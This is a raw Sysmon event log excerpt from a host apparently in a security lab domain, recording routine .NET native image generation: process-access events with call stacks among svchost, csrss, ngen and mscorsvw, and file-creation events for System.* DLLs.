13:50:35.415{59A5CD1D-922B-6005-0C04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11e4-0\System.AddIn.Contract.dll2021-01-18 13:50:35.415 10341000x80000000000000008283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:35.368{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922B-6005-0C04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.352{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-922B-6005-0C04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:35.352{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922B-6005-0C04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:35.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922B-6005-0B04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:35.321{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922B-6005-0B04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:35.321{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922B-6005-0B04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:35.243{59A5CD1D-922A-6005-0A04-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\dc-0\System.AddIn.dll2021-01-18 13:50:35.243 11241100x80000000000000008312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:50:36.993{59A5CD1D-922C-6005-1404-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\124c-0\System.Data.DataSetExtensions.dll2021-01-18 13:50:36.993 10341000x80000000000000008311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-1404-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.868{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-1404-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:36.868{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-1404-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:36.790{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-1304-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.774{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-1304-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:36.774{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-1304-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:36.712{59A5CD1D-922C-6005-1204-00000000A301}4908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\132c-0\System.ComponentModel.DataAnnotations.dll2021-01-18 13:50:36.712 10341000x80000000000000008304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:36.587{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-1204-00000000A301}4908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.571{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-1204-00000000A301}4908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:36.571{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-1204-00000000A301}4908C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:36.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-1104-00000000A301}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.508{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-1104-00000000A301}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:36.508{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-1104-00000000A301}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:36.446{59A5CD1D-922C-6005-1004-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1088-0\System.ComponentModel.Composition.Registration.dll2021-01-18 13:50:36.446 10341000x80000000000000008297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:36.337{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-1004-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.321{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-1004-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:36.321{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-1004-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:36.258{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-0F04-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 